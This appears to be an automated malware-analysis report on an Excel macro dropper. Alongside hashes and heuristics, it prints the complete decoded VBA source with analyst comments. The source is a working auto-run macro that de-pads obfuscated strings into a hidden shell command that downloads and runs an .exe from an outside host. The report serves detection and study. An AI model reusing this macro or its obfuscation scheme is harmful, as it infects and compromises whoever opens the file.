Xls.Dropper.Agent-1868825 — Office (OLE) malware analysis

Static analysis result for SHA-256 034d584f7f5e00f5…

MALICIOUS

Office (OLE)

70.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2017-02-23
MD5: a9f9bc3239f4e7ca750ecc6d6b145b59 SHA-1: 7b16e132c23416b1d523535e58c85460a3ca6e01 SHA-256: 034d584f7f5e00f558ec2bc28977a863b86332871018ed209814a2fed4e1a79e
148 Risk Score

Malware Insights

Xls.Dropper.Agent-1868825 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical heuristic 'OLE_VBA_SHELL' and the presence of a Workbook_Open macro indicate that the VBA code is designed to execute arbitrary commands. The ClamAV detection 'Xls.Dropper.Agent-1868825' strongly suggests this is a dropper. The VBA code itself is heavily obfuscated, but the Workbook_Open subroutine is present and calls a function that is likely responsible for executing the malicious payload, consistent with a dropper's behavior.

Heuristics 4

  • ClamAV: Xls.Dropper.Agent-1868825 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-1868825
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    cleantag = qfpnxorhuyjexpsya & blousedepth & eldertitle & "mK7pIB%7\IAZdJ7077vIBe7J3Z4KZ9R70I8Z4ZK3KQ9B72RK.JBeRxIe"
    Shell pvrspjwqcbai(cleantag), 0
    eaoskhjyyuh = "d9042ndoinle"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub Workbook_Open()
    Módulo1.blczjrjsxagnufbict

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4651 bytes
SHA-256: 67643eb61ca95cb2447e38c5c1c154a730dbc976966bff8ce2cfb5da56127b49
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-run entry point: Excel fires Workbook_Open when the workbook is opened with
' macros enabled, so this is the trigger for the whole chain (cf. heuristic OLE_VBA_WBOPEN).
Public Sub Workbook_Open()
' Hands straight off to the module-level routine that assembles and runs the payload.
Módulo1.blczjrjsxagnufbict
' Everything below is filler: 606 - 273 is non-zero (True in VBA), and the branch only
' assigns a local that is never read, so it has no effect on behaviour. Typical junk
' inserted to defeat signature matching on the short, otherwise-trivial sub.
itemtower = 606
If itemtower - 273 Then
jamkbwtpiimiuej = "prizetwin"
jamkbwtpiimiuej = 217
End If
End Sub


Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Módulo1"
' Character filter used by the string decoder below.
' Param dmcuojvvodansv: a single character (pvrspjwqcbai passes one Mid() char at a time).
' Returns: the character itself if it is NOT one of J, Z, K, I, B, 7, R, Q; otherwise "".
' The encoded payload strings are ordinary text padded with those eight junk letters,
' so dropping them recovers the cleartext. Behaviour for an empty-string argument is
' not exercised by the visible callers and is left unstated here.
Public Function remembertree(dmcuojvvodansv)
Dim cottonpanda As Boolean
xrtjmzehqflpmzpvza = ""
' InStrRev returns a position (non-zero) when the character occurs in the junk
' alphabet; assigning that Long to a Boolean yields True for "found", False for "not found".
cottonpanda = InStrRev("JZKIIB77BKRQ", dmcuojvvodansv)
' Filler: 242 - 5 is non-zero, the branch assigns a never-read local. No effect.
colorfeed = 242
If colorfeed - 5 Then
birdjunior = "labelsing"
birdjunior = 789
End If
' Only the "not in junk alphabet" case keeps the character.
If Not cottonpanda Then
nwwofunzqsybx = "qerxdnzup"
nwwofunzqsybx = 680
kzxefzlmbzgmqwoqogk = "zviivqwutjx"
kzxefzlmbzgmqwoqogk = 221
xrtjmzehqflpmzpvza = dmcuojvvodansv
girlhurt = "cjaafcurvval"
girlhurt = 753
enforcemosquito = 841
If enforcemosquito - 16 Then
enforcemosquito = enforcemosquito * 2
End If
End If
remembertree = xrtjmzehqflpmzpvza
' Filler after the return value is set; no observable effect.
lxfuhgjzsqwdratnh = 235
If lxfuhgjzsqwdratnh - 185 Then
lxfuhgjzsqwdratnh = lxfuhgjzsqwdratnh * 2
End If
End Function
' String decoder: walks the input one character at a time and keeps only what
' remembertree() returns, i.e. strips every J/Z/K/I/B/7/R/Q from the string.
' Param stxrtjmzehqflpmzpvza: the junk-padded command string built by the caller.
' Returns: the de-padded cleartext, which the caller passes directly to Shell.
' Analyst note: this is the single point where the real command becomes visible at
' runtime; the remainder of the function is dead assignments to never-read locals.
Public Function pvrspjwqcbai(stxrtjmzehqflpmzpvza)
foxnest = ""
arrestjunior = "dpoxbvjpndc"
arrestjunior = 402
silenttime = 96
If silenttime - 949 Then
hugidjceo = "gardenvintage"
hugidjceo = 476
End If
' 1-based loop over every character of the input.
For objnddhxxlaxrqgotpj = 1 To Len(stxrtjmzehqflpmzpvza)
bjehheinyjrnykqclcz = Mid(stxrtjmzehqflpmzpvza, objnddhxxlaxrqgotpj, 1)
creekinstall = 456
If creekinstall - 294 Then
creekinstall = creekinstall * 2
End If
parentwagon = "omwdzwmdcw"
parentwagon = 829
' Append the character (or "" if it is a junk letter) to the accumulator.
foxnest = foxnest & remembertree(bjehheinyjrnykqclcz)
auntshoot = 697
If auntshoot - 948 Then
yrivdtheiqlcqudx = "izmwldirafohqrlej"
yrivdtheiqlcqudx = 583
End If
giverocket = "vriukomjekiuym"
giverocket = 247
Next
dreamtravel = "hsafjdwyahm"
dreamtravel = 848
mzvprgrmmgxagnwvoew = "fabricturtle"
mzvprgrmmgxagnwvoew = 307
pvrspjwqcbai = foxnest
End Function
' Payload stage, invoked from Workbook_Open. Three junk-padded string fragments plus a
' trailing literal are concatenated, de-padded by pvrspjwqcbai(), and handed to Shell.
' None of the variables used here is declared (no Dim, no Option Explicit in the
' listing), so under VBA defaults they are implicit procedure-local Variants.
' Analyst note: the decoded command is deliberately not reproduced in these comments;
' the fragments, once the J/Z/K/I/B/7/R/Q padding is removed, contain an "http://"
' scheme and an ".exe" suffix, which is consistent with the download-and-execute
' dropper classification given for this sample. The Shell line (flagged by
' OLE_VBA_SHELL) together with Workbook_Open is the behaviour to key detections on.
Public Sub blczjrjsxagnufbict()
xrjmdgkgkdlzp = "finalfocus"
xrjmdgkgkdlzp = 22
jjiyrpxvzcrxpypdy = 141
' Empty If block: pure filler.
If jjiyrpxvzcrxpypdy - 973 Then
End If
' Fragment 2 of the encoded command (middle section, contains the padded URL).
blousedepth = "RnQtQI)J.KJDZo7RwKnKlIRoJZaQBdRBFJiIJlBeQ(JR'Kh7t7tRpBZ:JR/B/7dBIrIyJ7v7eIrQsKKd77o7QcIuQJmQQeJnZ7tBBsBRa7nJ7dQcIu7sBBtKBoB7mR.7cBoKKm7Q/RjK4ZvQK47u7Jp7dKaKZt73ZsR2Q0B1K6JB.7eIBxReKZ'I,R'K%IKT7KEKKM7PBI%B\K7A7RdRK07v77eI3I4BB9B0B8JR"
yfwjnveizdsmkgbntf = 849
If yfwjnveizdsmkgbntf - 600 Then
excusemonkey = "oftenpublic"
excusemonkey = 450
End If
' Fragment 1 of the encoded command (the interpreter invocation that starts the string).
qfpnxorhuyjexpsya = "7KcQmKdIB.BZeIxKKeIJ I7/KcI BpBoRwIe7JrBsBBh7eQZlKlZQ.BeZxKeR RB-JQwB KIh7iIdKd7eQQnJJ ZB-IInBIo7RpZ B-IeBBpIQ RbIyJpKIaBsKKsB I(BN7Ie7Iw7-IOBbBjQe7cJtRZ 7SQRyKIs7ItIQeKmIK.KNKeBtQK.IIWKReKKb7CZZlBi7BeZ"

vaxoaeoggkqklcsmj = "swwoppqrxkom"
vaxoaeoggkqklcsmj = 222
yzmlkpjldle = "nyfwywddppeyffo"
yzmlkpjldle = 163
' Fragment 3 of the encoded command (closes the download expression, ".exe" suffix).
eldertitle = "47Q3I9B2B.BeBKxIBeR'B)7J I&I KI%BKtII"
donatehead = "refruizdboqnnssyzi"
donatehead = 31
jtomgzynvrqxpwd = 900
If jtomgzynvrqxpwd - 505 Then
jtomgzynvrqxpwd = jtomgzynvrqxpwd * 2
End If
dbifksynyqelgbjokzh = "e20n23in"
ysybrszqrayue = 629
If ysybrszqrayue - 574 Then
End If
zolhlcvtgd = "beginvehicle"
zolhlcvtgd = 241
' Assembly order is fragment 1, fragment 2, fragment 3, then a fourth inline literal
' (the execution tail). Note the fragments are NOT assigned in the order they are joined.
cleantag = qfpnxorhuyjexpsya & blousedepth & eldertitle & "mK7pIB%7\IAZdJ7077vIBe7J3Z4KZ9R70I8Z4ZK3KQ9B72RK.JBeRxIe"
' Decode and execute. Second argument 0 is vbHide: the spawned process gets no window,
' so the user sees nothing when the workbook opens.
Shell pvrspjwqcbai(cleantag), 0
' Trailing filler; nothing below affects behaviour.
eaoskhjyyuh = "d9042ndoinle"
bittervoice = 24
If bittervoice - 873 Then
sqjdezstqxjn = "halfmask"
sqjdezstqxjn = 546
End If
gyoxeidduqt = "neofieon"
oystertotal = 609
If oystertotal - 967 Then
oystertotal = oystertotal * 2
End If

bzjpxzpncwo = "lxabasfdkt"
bzjpxzpncwo = 514
End Sub